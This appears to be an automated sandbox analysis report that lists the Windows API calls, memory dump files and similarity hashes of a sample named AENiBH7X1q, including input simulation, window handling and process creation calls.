                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C59B
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000104,?,?), ref: 0044C5EC
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000100,?,?), ref: 0044C610
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C637
                                                                                                                                                                                                                                                                                                                                                                                                                • SendInput.USER32 ref: 0044C6E2
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2221674350-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3a634557d1668dba9f4fbb3ffee1259adddcddb7f3fce46f2ce6721246940f3b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 061e63fcf1402e721e52ee56d2f22f81c2cbe03cfd8f861d8ff00d299370d474
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A24148725053486AF760EF209C80BFFBB98EF95324F04151FFDC412281D66E984987BA
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscpy$_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2037614760-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 871aa96d6b0d5f43eceffdadd72b032f7becd6ba50fbda5e2bca5dd503650597
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43efba16cd806b31402fe34b2becc3a5af32a5b4a383a164d4ea5773e04486ac
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D41BD31901A256BDE317F55D880BBB7358DFA1314F84006FF98247313EA6E5892C6BE
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • BeginPaint.USER32(00000000,?,004A83D8,?), ref: 00447B9D
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                                                                                                                                                                                                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                                                                                                                                                                                                                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                                                                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
• API String ID: 4189319755-0
• Opcode ID: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
• Instruction ID: de699fe3e67e71f806f86ee7feca1bcffcb0489daa19151882f3061068cc4b26
• Opcode Fuzzy Hash: 37bca05dc5f282a43c1c57c3b808f61ec058395b4d713bcb6da44fc2610780a1
• Instruction Fuzzy Hash: D14182705043019FE320DF15C8C8F7B7BA8EB89724F04466EF9548B391DB74A846CB69
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B490
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4C2
• EnterCriticalSection.KERNEL32(00000000), ref: 0044B4E3
• LeaveCriticalSection.KERNEL32(00000000), ref: 0044B5A0
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B5BB
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5D1
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID:
• API String ID: 1726766782-0
• Opcode ID: e3e231889b9edf0f74221ee0072ea4e59d90ce0ad37bc94b8ebeee311f112aa0
• Instruction ID: bf52b5dc2e344941501510e432fc863898df75637e45487ca8cd05157db66b41
• Opcode Fuzzy Hash: e3e231889b9edf0f74221ee0072ea4e59d90ce0ad37bc94b8ebeee311f112aa0
• Instruction Fuzzy Hash: 09415C75104701AFD320EF26D845EABB3F8EF88708F008E2DF59A92650D774E945CB6A
APIs
• ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 004410F9
• EnableWindow.USER32(?,00000000), ref: 0044111A
• ShowWindow.USER32(?,00000000,?,?,?,?,00448962,004A83D8,?,?), ref: 00441183
• ShowWindow.USER32(?,00000004,?,?,?,00448962,004A83D8,?,?), ref: 00441192
• EnableWindow.USER32(?,00000001), ref: 004411B3
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 004411D5
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
• Instruction ID: 824eeaafe1f931a994963cd163acc5b0ce47b26168a6fd4ee38d593e4569daee
• Opcode Fuzzy Hash: c853c7407bbaf9010c68549c691492fdcd401e5b0cb22aeb5446aebbed6f20c9
• Instruction Fuzzy Hash: 14417770604245DFE725CF14C984FA6B7E5BF89300F1886AEE6859B3B2CB74A881CB55
APIs
• SendMessageW.USER32(00000000,00001024,00000000,?), ref: 004490E3
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004490F8
• SendMessageW.USER32(00000000,0000111E,00000000,?), ref: 0044910D
• InvalidateRect.USER32(?,00000000,00000001), ref: 00449124
• GetWindowLongW.USER32(00000000,000000F0), ref: 0044912F
• SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0044913C
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend$LongWindow$InvalidateRect
• String ID:
• API String ID: 1976402638-0
• Opcode ID: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8b80d2acd15126bdfc8b54909556444574c0e56a9806921f1e0b477f33817628
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b574cf222373ea94a5f8b1e2da5d15417ee742d7ff148607d59a4e94613559a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F231B476244202AFF224DF04DC89FBBB7A9F785321F14492EF291973D0CA75AC469729
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00442597
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004344B7: GetWindowRect.USER32(?,?), ref: 004344D3
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 004425BF
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 004425C6
                                                                                                                                                                                                                                                                                                                                                                                                                • mouse_event.USER32(00008001,?,?,?,?), ref: 004425F5
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00442624
                                                                                                                                                                                                                                                                                                                                                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00442690
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4137160315-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                                                                                                                                                                                                                                                                                                                                                                • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Enable$Show$MessageSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1871949834-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 0044961A
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0044964A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004496BA
• _wcslen.LIBCMT ref: 004496C7
• SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: MessageSend$_wcslen$_memset_wcspbrk
• String ID:
• API String ID: 1624073603-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Similarity
• API ID: DestroyWindow$DeleteObject$IconMove
• String ID:
• API String ID: 1640429340-0
APIs
Similarity
• API ID: __fileno__setmode$DebugOutputString_fprintf
• String ID:
• API String ID: 3354276064-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 752480666-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$IconImageList_
• String ID:
• API String ID: 3275902921-0
• Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
• Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
• Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
• Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
APIs
• GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
• OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
• CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
• CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
• DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
• Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
• Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
• Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                                                                                                                                                                                                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 0041419B
                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 004141A8
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                                                                                                                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00414201
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
